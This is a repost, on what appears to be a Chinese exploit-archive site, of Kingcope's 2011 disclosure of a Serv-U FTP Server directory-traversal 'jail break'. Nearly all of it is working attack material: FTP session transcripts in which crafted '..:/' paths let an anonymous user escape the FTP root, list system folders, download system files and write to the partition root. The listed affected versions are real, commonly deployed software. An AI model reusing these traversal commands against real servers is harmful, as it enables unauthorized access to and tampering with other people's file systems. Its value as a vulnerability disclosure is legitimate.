首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Serv-U FTP Server Jail Break
来源:vfocus.net 作者:Kingcope 发布时间:2011-12-01  
I m better than TESO!
CONFIDENTIAL SOURCE MATERIALS!

[*]----------------------------------------------------[*]
	Serv-U FTP Server Jail Break 0day
	Discovered By Kingcope
	Year 2011
[*]----------------------------------------------------[*]

Affected:
220 Serv-U FTP Server v7.3 ready...
220 Serv-U FTP Server v7.1 ready...
220 Serv-U FTP Server v6.4 ready...
220 Serv-U FTP Server v8.2 ready...
220 Serv-U FTP Server v10.5 ready...

[*]----------------------------------------------------[*]
C:\Users\kingcope\Desktop>ftp 192.168.133.134
Verbindung mit 192.168.133.134 wurde hergestellt.
220 Serv-U FTP Server v6.4 for WinSock ready...
Benutzer (192.168.133.134:(none)): ftp								(anonymous user :>)
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> cd "/..:/..:/..:/..:/program files"
250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files
ftp> ls -la
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
dr--r--r--   1 user     group           0 Nov 12 21:48 .
dr--r--r--   1 user     group           0 Nov 12 21:48 ..
drw-rw-rw-   1 user     group           0 Feb 14  2011 Apache Software Foundatio
n
drw-rw-rw-   1 user     group           0 Feb  5  2011 ComPlus Applications
drw-rw-rw-   1 user     group           0 Jul 11 01:06 Common Files
drw-rw-rw-   1 user     group           0 Jul  8 16:57 CoreFTPServer
drw-rw-rw-   1 user     group           0 Jul 11 01:06 IIS Resources
d---------   1 user     group           0 Jul  8 16:12 InstallShield
Installation Information
drw-rw-rw-   1 user     group           0 Jul 29 15:07 Internet Explorer
drw-rw-rw-   1 user     group           0 Jul  8 16:12 Ipswitch
drw-rw-rw-   1 user     group           0 Feb 12  2011 Java
drw-rw-rw-   1 user     group           0 Jul 26 13:19 NetMeeting
drw-rw-rw-   1 user     group           0 Jul 29 14:39 Outlook Express
drw-rw-rw-   1 user     group           0 Jul  8 15:39 PostgreSQL
drw-rw-rw-   1 user     group           0 Nov 12 21:48 RhinoSoft.com
drw-rw-rw-   1 user     group           0 Feb 12  2011 Sun
d---------   1 user     group           0 Jul 29 15:13 Uninstall Information
drw-rw-rw-   1 user     group           0 Feb  5  2011 VMware
drw-rw-rw-   1 user     group           0 Jul  8 15:34 WinRAR
drw-rw-rw-   1 user     group           0 Jul 26 13:30 Windows Media Player
drw-rw-rw-   1 user     group           0 Feb  5  2011 Windows NT
d---------   1 user     group           0 Feb  5  2011 WindowsUpdate
226 Transfer complete.
FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s
ftp>
[*]----------------------------------------------------[*]
with write perms:
ftp> put foo.txt ..:/..:/..:/foobar <<-- writes foo into root of partition
[*]----------------------------------------------------[*]
and as anonymous ftp:
ftp> get ..:/..:/..:/..:/windows/system32/calc.exe yes
200 PORT Command successful.
150 Opening ASCII mode data connection for calc.exe (115712 Bytes).
226 Transfer complete.
FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s
[*]----------------------------------------------------[*]

This works to!!! :

220 Serv-U FTP Server v7.3 ready...
Benutzer (xx.xx.xx.xx:(none)): ftp
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\*"
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
AUTOEXEC.BAT
boot.ini
bootfont.bin
bsmain_runtime.log
CONFIG.SYS
Documents and Settings
FPSE_search
Inetpub
IO.SYS
log
MSDOS.SYS
msizap.exe
MSOCache
mysql
NTDETECT.COM
ntldr
Program Files
RavBin
RECYCLER
Replay.log
rising.ini
System Volume Information
TDDOWNLOAD
WCH.CN
WINDOWS
wmpub
226 Transfer complete. 317 bytes transferred. 19.35 KB/sec.
FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s

[*]----------------------------------------------------[*]
Sometimes you need to give it the path:

ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\"
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\*"
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
360
Adobe
ASP.NET
CCProxy
CE Remote Tools
cmak
Common Files
ComPlus Applications
D-Tools
FFTPServer
HTML Help Workshop
IISServer
InstallShield Installation Information
Intel
Internet Explorer
Java
JavaSoft
K-Lite Codec Pack
Microsoft ActiveSync
Microsoft Analysis Services
Microsoft Device Emulator
Microsoft MapPoint Web Service Samples
Microsoft MapPoint Web Service SDK, Version 4.0
Microsoft Office
Microsoft Office Servers
Microsoft Silverlight
Microsoft SQL Server
Microsoft Visual SourceSafe
Microsoft Visual Studio 8
Microsoft.NET
MSBuild
MSXML 6.0
NetMeeting
Outlook Express
PortMap1.61
Reference Assemblies
Rising
SQLXML 4.0
SQLyog Enterprise
STS2Setup_2052
Symantec
Thunder Network
TSingVision
Uninstall Information
Windows Media Player
Windows NT
WindowsUpdate
WinRAR
226 Transfer complete. 835 bytes transferred. 50.96 KB/sec.
FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s
ftp>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Java Applet Rhino Script Engin
·Mercury/32 v4.52 IMAPD SEARCH
·CTEK SkyRouter 4200 and 4300 C
·Titan FTP Server 8.40 DoS Kern
·Bugbear FlatOut 2005 Malformed
·GOM Player 2.1.33.5071 ASX Fil
·Android 'content://' URI Multi
·MS11-080 Afd.sys Privilege Esc
·Linux/MIPS - add user(UID 0) w
·CCMPlayer 1.5 Stack based Buff
·Linux/MIPS - execve /bin/sh -
·IBM Lotus Domino Server Contro
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved